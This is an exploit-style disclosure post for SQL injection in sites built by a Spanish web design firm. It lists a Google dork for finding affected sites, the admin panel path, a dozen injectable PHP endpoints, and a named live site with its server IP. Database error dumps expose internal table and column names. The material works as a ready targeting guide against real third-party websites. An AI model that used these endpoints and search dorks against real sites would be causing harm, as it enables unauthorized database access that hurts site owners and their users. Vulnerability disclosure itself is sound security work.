Desarrollado por OxiGenic Web Design Spain SQL Injection

1. ####################################################################
2.  
3. # Exploit Title : Desarrollado por OxiGenic Web Design Spain SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 15/01/2019
7. # Vendor Homepage : oxigenic.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desarrollado por OXIGENIC''
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ####################################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19. /admin
20.  
21. # SQL Injection Exploit :
22. ***********************
23.  
24. /notificacion.php?id=[SQL Injection]
25.  
26. /noticias.php?id=[SQL Injection]
27.  
28. /fotogal_cp.php?id=[SQL Injection]
29.  
30. /fotocp.php?id=[SQL Injection]
31.  
32. /pesca.php?id=[SQL Injection]
33.  
34. /fotocp.php?id=[SQL Injection]
35.  
36. /printentrevista.php?id=[SQL Injection]
37.  
38. /acto.php?id=[SQL Injection]
39.  
40. /asoc.php?id=[SQL Injection]
41.  
42. /cazal.php?sec=[SQL Injection]
43.  
44. /asocl.php?sec=[SQL Injection]
45.  
46. /fotoacto.php?id=[SQL Injection]
47.  
48. ####################################################################
49.  
50. # Example Vulnerable Site :
51. *************************
52.  
53. [+] bardenasreales.es/notificacion.php?id=41%27 =>
54.  
55. [ Proof of Concept ] => archive.is/fpP4F
56.  
57. Note : (149.202.228.232) => There are 403 domains hosted on this server.
58.  
59. ####################################################################
60.  
61. # SQL Database Error :
62. **********************
63.  
64. Database error: Invalid SQL: SELECT articulos.id AS id, fecha, tema,
65. titulo, subtitulo, texto, foto1, foto1_m, foto2, foto2_p, foto3, foto3_p, foto4,
66. foto4_p, foto5, foto5_p, foto6, foto6_p, pie1, pie2, pie3, pie4, pie5, pie6, informa,
67. fotosde, notrelacionada1, notrelacionada2, notrelacionada3, enlace1, url1, enlace2, url2,
68. enlace3, url3, fuente, urlfuente FROM articulos,temas WHERE
69. articulos.activo='1' AND temas.id=articulos.tema AND temas.activo='1' AND articulos.id='126''
70.  
71. MySQL Error: 1064 (You have an error in your SQL syntax; check the
72. manual that corresponds to your MariaDB server version for the
73. right syntax to use near ''126''' at line 41)
74. Session halted.
75.  
76. Database error: Invalid SQL: SELECT id, fecha, titulo, texto, informa, foto1
77. FROM notificaciones WHERE id='41'' AND activo='1'
78.  
79. MySQL Error: 1064 (You have an error in your SQL syntax; check the manual
80. that corresponds to your MariaDB server version for the
81. right syntax to use near '1'' at line 8)
82. Session halted.
83.  
84. Database error: Invalid SQL: SELECT foto, pie
85. FROM galerias_cp WHERE id='113'' AND activo='1'
86.  
87. MySQL Error: 1064 (You have an error in your SQL syntax;
88. check the manual that corresponds to your MariaDB server
89. version for the right syntax to use near '1'' at line 4)
90. Session halted.
91.  
92. Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo, subtitulo,
93. texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3, foto4,
94. foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat, cazapescasubcat.nombre
95. AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE cazapesca.activo='1'
96. AND cazapescasubcat.id=cazapesca.idsubcat AND cazapescasubcat.idcat='2'
97. AND cazapescasubcat.activo='1' AND cazapesca.id='26''
98.  
99. MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that
100. corresponds to your MariaDB server version for the right syntax to use near ''26''' at line 32)
101. Session halted.
102.  
103. Database error: Invalid SQL: SELECT foto as foto, pie as pie FROM
104. cazapesca WHERE id='266'' AND activo='1'
105.  
106. MySQL Error: 1064 (You have an error in your SQL syntax; check the
107. manual that corresponds to your MariaDB server version for the right
108. syntax to use near '1'' at line 4)
109. Session halted.
110.  
111. Database error: Invalid SQL: SELECT * FROM entrevistas WHERE id='6''
112. AND activo='1'
113.  
114. MySQL Error: 1064 (You have an error in your SQL syntax; check the
115. manual that corresponds to your MariaDB server version for the
116. right syntax to use near '1'' at line 3)
117. Session halted.
118.  
119. Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo,
120. subtitulo, texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3,
121. foto4, foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat,
122. cazapescasubcat.nombre AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE
123. cazapesca.activo='1' AND cazapescasubcat.id=cazapesca.idsubcat AND
124. cazapescasubcat.idcat='3' AND cazapescasubcat.activo='1' AND cazapesca.id='156''
125.  
126. MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds
127. to your MariaDB server version for the right syntax to use near ''156''' at line 32)
128. Session halted.
129.  
130. ####################################################################
131.  
132. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
133.  
134. ####################################################################